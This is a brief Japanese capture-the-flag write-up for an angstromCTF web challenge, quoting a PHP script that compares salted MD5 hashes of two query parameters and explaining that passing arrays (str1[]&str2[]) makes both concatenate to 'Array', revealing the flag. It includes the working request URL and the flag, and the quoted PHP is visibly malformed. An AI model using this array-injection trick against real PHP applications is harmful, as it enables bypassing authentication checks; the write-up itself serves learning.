md5 (Web 140)
以下のソースが与えられる。
code:md5.php
<?php
include 'secret.php';
hash("md5", $salt . $_GET"str1") === hash("md5", $salt . $_GET"str2")) { echo $flag;
} else {
echo "Sorry, you're wrong.";
}
exit();
}
?>
cryptoをちょくちょく学んでいたためか伸長攻撃かな?と一瞬思ったが、そもそもハッシュが与えられないのでそれは違った。
いろいろ考えてhttp://web.angstromctf.com:3003/?str1[]=bbb&str2[]=aaaで通った。
配列を.で連結すると内容に関わらず"Array"になる。
code:php
var_dump("hoge" . array("aaa")); #=> "hogeArray" var_dump("hoge" . array("bbb")); #=> "hogeArray" actf{but_md5_has_charm}